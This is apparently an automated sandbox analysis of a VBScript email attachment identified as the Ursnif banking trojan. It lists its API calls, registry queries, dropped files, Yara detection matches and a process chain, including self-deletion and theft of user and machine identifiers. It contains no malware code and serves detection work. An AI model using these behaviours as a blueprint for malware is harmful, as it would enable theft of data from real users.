Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 20_2_702A4E5F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 20_2_702A4EAA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 20_2_702A4F45
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 20_2_702A4FD0
Queries the installation date of Windows
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\assai.zip VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_7025116D GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, 20_2_7025116D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_00DCA12A wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 20_2_00DCA12A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_70251756 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 20_2_70251756
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match File source: 00000014.00000003.404725066.0000000000BC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 20.2.rundll32.exe.70250000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.rundll32.exe.bca25e.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected Ursnif
Source: Yara match File source: 00000014.00000003.404725066.0000000000BC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 20.2.rundll32.exe.70250000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.rundll32.exe.bca25e.0.raw.unpack, type: UNPACKEDPE
Behavior Graph

Behavior Graph ID: 384531
Sample: Attachment_32954.vbs
Startdate: 09/04/2021
Architecture: WINDOWS
Score: 92

Process chain: wscript.exe -> rundll32.exe -> rundll32.exe
Files dropped by wscript.exe: C:\Users\user\AppData\Local\Temp\Rabin.dmg (PE32), C:\Users\user\AppData\Local\Temp\assai.zip (Zip)
Signatures at start: Found malware configuration; Multi AV Scanner detection for dropped file; Multi AV Scanner detection for submitted file; Yara detected Ursnif
Signatures on wscript.exe: Benign windows process drops PE files; VBScript performs obfuscated calls to suspicious functions; Deletes itself after installation
No contacted IP infos